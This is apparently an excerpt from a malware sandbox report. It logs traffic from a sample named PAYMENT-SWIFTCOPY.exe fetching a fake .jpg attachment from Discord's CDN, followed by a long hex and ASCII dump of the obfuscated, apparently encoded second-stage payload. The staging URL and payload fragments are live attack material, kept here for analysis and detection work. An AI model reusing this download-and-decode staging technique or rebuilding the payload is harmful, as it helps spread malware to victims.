                                                                                                7192.168.2.549756162.159.130.233443C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-26 15:35:14 UTC6041OUTGET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1
                                                                                                Host: cdn.discordapp.com
                                                                                                2021-10-26 15:35:14 UTC6041INHTTP/1.1 200 OK
                                                                                                Date: Tue, 26 Oct 2021 15:35:14 GMT
                                                                                                Content-Type: image/jpeg
                                                                                                Content-Length: 693967
                                                                                                Connection: close
                                                                                                CF-Ray: 6a44c0dcc9f22b7d-FRA
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 2120
                                                                                                Cache-Control: public, max-age=31536000
                                                                                                ETag: "23a5250b8d90156e7d3cdf648d28e9da"
                                                                                                Expires: Wed, 26 Oct 2022 15:35:14 GMT
                                                                                                Last-Modified: Tue, 26 Oct 2021 12:48:09 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                CF-Cache-Status: HIT
                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                Cf-Bgj: h2pri
                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                x-goog-generation: 1635252489262793
                                                                                                x-goog-hash: crc32c=la2Ogw==
                                                                                                x-goog-hash: md5=I6UlC42QFW59PN9kjSjp2g==
                                                                                                x-goog-metageneration: 1
                                                                                                x-goog-storage-class: STANDARD
                                                                                                x-goog-stored-content-encoding: identity
                                                                                                x-goog-stored-content-length: 693967
                                                                                                X-GUploader-UploadID: ADPycdugciGjaBfm1jkRHrCGp6TL-hiSTfEGgfhLw1xDKH1ZiuRprzVhtotiFAMhjRQuGamJ9-8cZedzcbOg46e7pu4
                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ul5DwcW9J9oEsAO8GoOfTloj6UuFt3pQbvVOAD81%2BCwc%2Fqfm1jkGpA9q2EYyMdgkWobNtpiDmGpRRqGYOYdI0nXkajvErKKbCwcSaDY8kEpgBWNO56jyJuHKkhfmTVkdyLgUmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                2021-10-26 15:35:14 UTC6042INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                2021-10-26 15:35:14 UTC6042INData Raw: 53 20 55 55 20 53 20 55 55 20 53 20 4f 4f 20 53 20 50 69 20 53 20 6e 6e 20 53 20 70 55 20 53 20 50 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 6e 55 20 53 20 54 53 53 20 53 20 54 53 53 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 54 53 6e 20 53 20 70 55 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 6e 70 20 53 20 50 70 20 53 20 6e 67 20 53 20 6e 4d 20 53 20 6e 54 20 53 20 50 4d 20 53 20 6e 53 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 55 20 53 20 54 54 50 20
                                                                                                Data Ascii: S UU S UU S OO S Pi S nn S pU S Pg S in S in S ig S nU S TSS S TSS S TMM S TTT S TSn S pU S TTT S pP S pP S nS S Pg S OU S TMT S OO S ng S pO S pP S nS S On S np S Pp S ng S nM S nT S PM S nS S UT S pP S pP S nO S TSP S UP S nO S TTO S pP S pP S UU S TTP
                                                                                                2021-10-26 15:35:14 UTC6044INData Raw: 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 55 20 53 20 70 55 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 50 50 20 53 20 54 54 4f 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 6e 53 20 53 20 70 50 20 53 20 69 67 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 69 4f 20 53 20 50 70 20 53 20 6e 50 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 70 20 53 20 55 50 20 53 20 55 55 20 53 20 50 70 20 53 20 55 50 20 53 20 6e 54 20 53 20 54 53 70 20 53 20 69 55 20 53 20 55 70 20
                                                                                                Data Ascii: S On S TSi S pU S in S nS S OU S pU S pP S UT S pP S pP S PP S TTO S PM S TSU S nS S nS S pP S ig S pO S ng S TTO S pO S pP S pP S ng S PS S iO S Pp S nP S TSp S in S in S ig S TSg S TSP S in S US S in S in S TSp S UP S UU S Pp S UP S nT S TSp S iU S Up
                                                                                                2021-10-26 15:35:14 UTC6045INData Raw: 53 20 70 55 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 54 54 6e 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 54 54 54 20 53 20 54 54 55 20 53 20 6e 54 20 53 20 54 53 70 20 53 20 55 50 20 53 20 50 54 20 53 20 50 70 20 53 20 55 50 20 53 20 55 4f 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 55 53 20 53 20 54 54 4f 20 53 20 6e 69 20 53 20 55 4d 20 53 20 55 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 53 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54 70 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 54 53 53 20 53 20 55
                                                                                                Data Ascii: S pU S TTU S TMM S TTn S nO S TSp S pO S UT S pP S pp S iU S pP S TTT S TTU S nT S TSp S UP S PT S Pp S UP S UO S iO S nn S US S TTO S ni S UM S UP S US S Pn S iO S pO S US S Pn S iO S nS S US S Pp S Up S TTp S nn S pp S pP S pP S pU S TTU S TMM S TSS S U
                                                                                                2021-10-26 15:35:14 UTC6046INData Raw: 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 69 20 53 20 6e 50 20 53 20 6e 4f 20 53 20 55 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 4f 6e 20 53 20 54 4d 4d 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 50 69 20 53 20 6e 54 20 53 20 70 50 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 55 20 53 20 55 70 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 54 54 55 20 53 20 55 53 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 54 53 50 20 53 20 54 53 6e 20 53 20 54 4d 54 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 4f 6e 20 53 20 55 53 20 53 20 50 70 20
                                                                                                Data Ascii: n S in S in S Pi S nP S nO S Up S pP S pP S pn S nU S TSi S On S TMM S PP S in S in S Pn S UT S Pi S nT S pP S TTn S pP S pP S pp S UU S Up S TTU S Pn S iO S pn S ng S PS S nS S TTU S US S PT S in S in S PS S TSP S TSn S TMT S pO S pP S pP S On S US S Pp
                                                                                                2021-10-26 15:35:14 UTC6048INData Raw: 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 54 53 4d 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 54 54 4d 20 53 20 54 53 70 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 54 53 4d 20 53 20 54 54 4f 20 53 20 54 53 67 20 53 20 55 54 20 53 20 70 50 20 53 20 55 50 20 53 20 55 4f 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 54 54 67 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 55 20 53 20 55 6e 20 53 20 55 70 20 53 20 50 54 20 53 20 55 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 4f
                                                                                                Data Ascii: P S nO S TSP S TTO S nn S TTO S pP S pP S Un S TSM S Pn S iU S ni S pP S TSp S TTT S TTM S TSp S nn S pP S pP S nS S TSU S TSM S TTO S TSg S UT S pP S UP S UO S nO S in S TTg S pO S UT S pP S pP S pP S nU S Un S Up S PT S UT S in S in S PT S UT S TSn S pO
                                                                                                2021-10-26 15:35:14 UTC6049INData Raw: 6e 4d 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 55 53 20 53 20 70 50 20 53 20 55 55 20 53 20 69 4f 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 55 20 53 20 55 70 20 53 20 54 53 50 20 53 20 69 67 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 50 50 20 53 20 70 4f 20 53 20 70 70 20 53 20 55 69 20 53 20 55 70 20 53 20 54 53 55 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 4f 4f 20 53 20 55 69 20 53 20 54 54 54 20 53 20 54 54 54 20 53 20 55 55 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 50 50 20 53 20 55 55 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 67 20 53 20 69 4f
                                                                                                Data Ascii: nM S OO S pP S pP S pU S US S pP S UU S iO S Pg S OU S TMT S OO S nU S Up S TSP S ig S TMT S pU S PP S pO S pp S Ui S Up S TSU S TST S nU S UM S OO S Ui S TTT S TTT S UU S OO S pP S pP S nS S pU S TTT S PP S UU S OO S pP S pP S US S Pn S iO S pU S ng S iO
                                                                                                2021-10-26 15:35:14 UTC6050INData Raw: 70 50 20 53 20 54 53 55 20 53 20 6e 55 20 53 20 55 55 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 6e 20 53 20 50 6e 20 53 20 4f 55 20 53 20 54 54 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 53 20 53 20 70 50 20 53 20 6e 4f 20 53 20 50 70 20 53 20 6e 55 20 53 20 69 55 20 53 20 70 55 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 69 6e 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 55 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 53 6e 20 53 20 70 70 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 54 54 69 20 53 20 70 6e 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54 67 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 54 54 4f 20 53 20 69 6e 20 53
                                                                                                Data Ascii: pP S TSU S nU S UU S in S PT S UP S ng S in S Pn S OU S TTi S pP S TSp S US S pP S nO S Pp S nU S iU S pU S ng S TTp S nS S in S ng S TTp S nU S pO S ng S TSn S pp S TSP S in S US S TTi S pn S US S Pp S Up S TTg S nn S pp S pP S pP S ng S TTU S TTO S in S
                                                                                                2021-10-26 15:35:14 UTC6052INData Raw: 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 55 20 53 20 6e 6e 20 53 20 55 55 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 54 54 54 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 70 20 53 20 54 53 55 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 53 20 53 20 54 53 70 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 54 20 53 20 55 70 20 53 20 54 4d 54 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 54 53 53 20 53 20 54 53 4f 20 53 20 54 53 50 20 53 20 4f 55 20 53 20 50 54 20 53 20 55 4f 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e
                                                                                                Data Ascii: S pP S UT S pP S pP S Un S UU S nn S UU S TSp S UO S UU S TTT S in S TSM S in S in S Up S TSU S pn S nU S TSi S TSS S TSp S PP S in S in S in S TTT S Up S TMT S TTO S pP S pP S nS S TSU S OS S Pi S TTO S TSS S TSO S TSP S OU S PT S UO S ig S in S in S in
                                                                                                2021-10-26 15:35:14 UTC6053INData Raw: 20 53 20 55 6e 20 53 20 54 53 6e 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 54 53 67 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 54 4d 4d 20 53 20 6e 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 4d 53 20 53 20 54 54 4f 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 54 53 69 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 69 4f 20 53 20 54 53 6e 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 54 53 69 20 53 20 4f 53 20 53 20 54 53 70 20 53 20 55 4f 20 53 20
                                                                                                Data Ascii: S Un S TSn S UT S pP S pP S TSp S UO S UU S TSg S in S TSM S in S in S TSg S Pp S UT S nn S UP S nO S TSp S TMM S nP S TTO S pP S pP S TMS S TTO S UT S TSn S iO S nn S TSi S pP S pP S nO S TSP S iO S TSn S UT S pP S pP S TSP S in S TSi S OS S TSp S UO S
                                                                                                2021-10-26 15:35:14 UTC6054INData Raw: 20 55 4d 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 50 70 20 53 20 6e 6e 20 53 20 55 53 20 53 20 54 53 69 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 55 69 20 53 20 54 53 4d 20 53 20 54 4d 53 20 53 20 55 4d 20 53 20 55 50 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 6e 69 20 53 20 55 55 20 53 20 54 53 4d 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 6e 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 4d 4d 20 53 20 54 54 55 20 53 20 70 55 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 50 4d 20 53 20 70 55 20
                                                                                                Data Ascii: UM S TSg S pP S pP S UP S nO S TSP S ng S nO S pP S pP S pP S nO S Pp S nn S US S TSi S nn S pP S pp S pP S pP S pn S nU S Ui S TSM S TMS S UM S UP S nS S On S ni S UU S TSM S TMM S TTT S nP S in S PT S in S in S TMM S TTU S pU S TSP S UP S UU S PM S pU
                                                                                                2021-10-26 15:35:14 UTC6056INData Raw: 53 20 50 54 20 53 20 55 50 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 55 20 53 20 50 70 20 53 20 50 69 20 53 20 70 70 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 53 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 55 50 20 53 20 6e 69 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 6e 20 53 20 54 54 54 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 50 4d 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 55 20 53 20 50 70 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 6e 20 53 20 55 50 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20
                                                                                                Data Ascii: S PT S UP S UT S in S PT S UP S nn S in S PT S UP S ng S in S PT S UU S Pp S Pi S pp S TTO S nM S pP S pP S pn S nS S TTO S nM S UP S ni S in S TMS S Un S TTT S TTO S pO S pP S pP S TSP S UP S UU S PM S in S PT S UU S Pp S in S TMS S Un S UP S TTO S pO S
                                                                                                2021-10-26 15:35:14 UTC6057INData Raw: 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 54 20 53 20 54 54 54 20 53 20 70 70 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 55 20 53 20 50 70 20 53 20 55 70 20 53 20 69 6e 20 53 20 50 6e 20 53 20 69 4f 20 53 20 50 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 55 6e 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 6e 67 20 53 20 54 4d 4d 20 53 20 54 54 4f 20 53 20 70 55 20 53 20 54 54 55 20 53 20 70 55 20 53 20 50 69 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 67 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 4d 20
                                                                                                Data Ascii: US S Pn S iO S pU S US S Pn S iO S pn S nT S TTT S pp S in S PT S UU S Pp S Up S in S Pn S iO S Pn S US S in S Un S Pi S TTO S ng S TMM S TTO S pU S TTU S pU S Pi S TMT S pU S in S TSS S Ug S pU S in S TSS S UM S TMM S in S TSS S UM S TSp S in S TSS S UM
                                                                                                2021-10-26 15:35:14 UTC6058INData Raw: 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 6e 55 20 53 20 55 54 20 53 20 4f 53 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 54 53 53 20 53 20 50 70 20 53 20 55 53 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 50 20 53 20 69 4f 20 53 20 54 53 70 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 55 70 20 53 20 54 54 69 20 53 20 54 53 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 4f 55 20 53 20 50 54 20 53 20 54 54 4f 20 53 20 69 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 4f 53 20 53 20 54 54 54 20
                                                                                                Data Ascii: S TMM S in S in S iO S nU S UT S OS S TTT S TSO S TSS S Pp S US S TMM S in S in S ig S TSP S iO S TSp S TSg S pP S pP S TSP S PT S UP S nn S TSg S Pp S UT S nn S Up S TTi S TSg S pO S pP S UT S pP S pP S TSp S OU S PT S TTO S in S US S in S in S OS S TTT
                                                                                                2021-10-26 15:35:14 UTC6060INData Raw: 53 20 54 54 55 20 53 20 54 53 4d 20 53 20 70 55 20 53 20 50 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 54 20 53 20 70 6e 20 53 20 54 53 50 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 4f 20 53 20 6e 55 20 53 20 54 54 55 20 53 20 54 53 67 20 53 20 54 4d 53 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 6e 4f 20 53 20 55 4d 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 54 53 4f 20 53 20 54 54 54 20 53 20 54 53 55 20 53 20 55 70 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 50 6e 20 53 20 50 70 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 55 50 20 53 20 54 53 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 70 70 20 53 20 4f 53
                                                                                                Data Ascii: S TTU S TSM S pU S Pp S in S in S in S TTT S pn S TSP S UP S pP S pP S nS S TSO S nU S TTU S TSg S TMS S pn S pP S pP S pp S TSO S nO S UM S Pn S iU S ni S TSO S TTT S TSU S Up S PM S TSU S Pn S Pp S nO S TSp S UP S TSp S UT S pP S pP S TSi S OO S pp S OS
                                                                                                2021-10-26 15:35:14 UTC6061INData Raw: 54 54 20 53 20 69 55 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 55 53 20 53 20 70 4f 20 53 20 70 55 20 53 20 6e 53 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 54 4d 53 20 53 20 55 54 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 50 6e 20 53 20 55 54 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 4f 20 53 20 54 53 6e 20 53 20 55 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 55 70 20 53 20 50 54 20 53 20 50 70 20 53 20 50 69 20 53 20 55 53 20 53 20 50 4d 20 53 20 54 54 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 55 20 53 20 54 53 70 20 53 20 55 50 20 53 20
                                                                                                Data Ascii: TT S iU S pP S pP S ng S US S pO S pU S nS S TST S nU S UM S TSM S TMS S UT S TSp S UO S UP S pP S in S in S in S in S On S TSi S Pn S UT S TSp S UO S UO S TSn S UM S pP S pP S pP S TSP S Up S PT S Pp S Pi S US S PM S TTp S pP S pP S pp S UU S TSp S UP S
                                                                                                2021-10-26 15:35:14 UTC6062INData Raw: 20 53 20 50 4d 20 53 20 69 4f 20 53 20 6e 53 20 53 20 69 6e 20 53 20 6e 53 20 53 20 70 6e 20 53 20 6e 55 20 53 20 55 4d 20 53 20 55 4f 20 53 20 54 53 69 20 53 20 54 54 67 20 53 20 6e 4d 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 4f 20 53 20 54 53 69 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 54 20 53 20 55 4d 20 53 20 55 67 20 53 20 69 55 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 6e 55 20 53 20 4f 55 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 4f 20 53 20 6e 50 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 55 54 20 53 20 70 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 50 69 20 53 20 70 55 20 53
                                                                                                Data Ascii: S PM S iO S nS S in S nS S pn S nU S UM S UO S TSi S TTg S nM S iO S pn S nU S TSi S TSO S TSi S pO S pP S pP S pU S TTT S UM S Ug S iU S pP S pP S ng S nO S nU S OU S US S in S in S in S TTO S nP S nU S TSi S UT S pU S in S in S in S Pn S UT S Pi S pU S
                                                                                                2021-10-26 15:35:14 UTC6064INData Raw: 70 20 53 20 54 53 69 20 53 20 54 53 69 20 53 20 54 53 69 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 69 67 20 53 20 70 6e 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 69 67 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 69 67 20 53 20 54 54 67 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 50 20 53 20 6e 70 20 53 20 54 53 4d 20 53 20 55 54 20 53 20 54 53 69 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 54 20 53 20 54 53 50 20 53 20 70 4f 20 53 20 54 4d 54 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 50 70 20 53 20 54 53 4d 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 69 6e 20 53 20 4f 55 20 53 20 69 6e 20
                                                                                                Data Ascii: p S TSi S TSi S TSi S pO S pP S pP S pn S pU S ig S pn S pp S iU S pP S PM S TSU S nS S ig S ng S nO S ig S TTg S pO S UT S pP S pP S pP S nP S np S TSM S UT S TSi S iO S pU S nT S TSP S pO S TMT S UP S pP S pP S TSP S Pp S TSM S TTT S TSO S in S OU S in
                                                                                                2021-10-26 15:35:14 UTC6065INData Raw: 20 70 55 20 53 20 54 54 54 20 53 20 54 4d 53 20 53 20 54 4d 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 69 4f 20 53 20 6e 55 20 53 20 54 54 67 20 53 20 6e 53 20 53 20 6e 4d 20 53 20 54 54 54 20 53 20 6e 70 20 53 20 54 54 6e 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 55 4f 20 53 20 50 67 20 53 20 6e 4d 20 53 20 50 54 20 53 20 55 54 20 53 20 6e 50 20 53 20 55 70 20 53 20 50 4d 20 53 20 69 4f 20 53 20 6e 53 20 53 20 54 54 67 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 54 69 20 53 20 6e 4f 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 69 4f 20 53 20 6e 53 20 53 20 50 53 20 53 20 6e 67 20 53 20 69 4f 20 53 20 69 4f 20 53 20 54 54 67 20 53 20 6e 4f 20 53 20 54 53 70
                                                                                                Data Ascii: pU S TTT S TMS S TMT S PM S pP S pP S ng S iO S nU S TTg S nS S nM S TTT S np S TTn S TMM S in S in S PS S UO S Pg S nM S PT S UT S nP S Up S PM S iO S nS S TTg S nS S pU S TTT S TTi S nO S PT S in S in S PM S iO S nS S PS S ng S iO S iO S TTg S nO S TSp
